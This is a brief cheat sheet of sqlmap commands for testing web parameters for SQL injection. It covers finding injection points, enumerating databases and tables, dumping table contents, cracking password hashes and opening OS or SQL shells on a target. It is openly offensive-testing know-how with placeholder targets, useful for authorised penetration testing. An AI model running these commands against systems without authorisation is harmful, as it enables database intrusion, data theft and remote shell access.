Basic sqlmap
Running sqlmap against GET parameters
Finding injection points and the database type
sqlmap -u "target_url" -b
e.g.
sqlmap -u "http://test.com/index.php?user=abcd" -b
-b = Retrieve DBMS banner: tries to get infomation about the underlying database. Returns a list of injection points and the database type.
Finding the current database user
sqlmap -u "target_url" --current-user
To get an active shell on the database
sqlmap -u "target_url" --os-shell
Forcing the database type
sqlmap -u "target_url" --dbms=[database type]
To have SQLMAP guide you through the process:
sqlmap --wizard
Running sqlmap against POST parameters
sqlmap -u "target_url" --data="author=admin" -b
e.g.
sqlmap -u "http://test.com/index.php" --data="author=admin" -b
Getting a list of the databases present on the remote system
sqlmap -u "target_url" --dbs
Finding the tables that exist in a database
sqlmap -u "target_url" --tables -D database_name
Getting the columns from a table
sqlmap -u "target_url" --columns -D database_name -T table_name
Dumping data from a table
sqlmap -u "target_url" --dump -D database_name -T table_name
To start an interactive shell
sqlmap -u "target_url" --sql-shell -D database_name -T table_name
To break password hashes
sqlmap -u "target_url" --passwords -D database_name -T table_name
To search for common table names
sqlmap -u "target_url" --common-tables -D database_name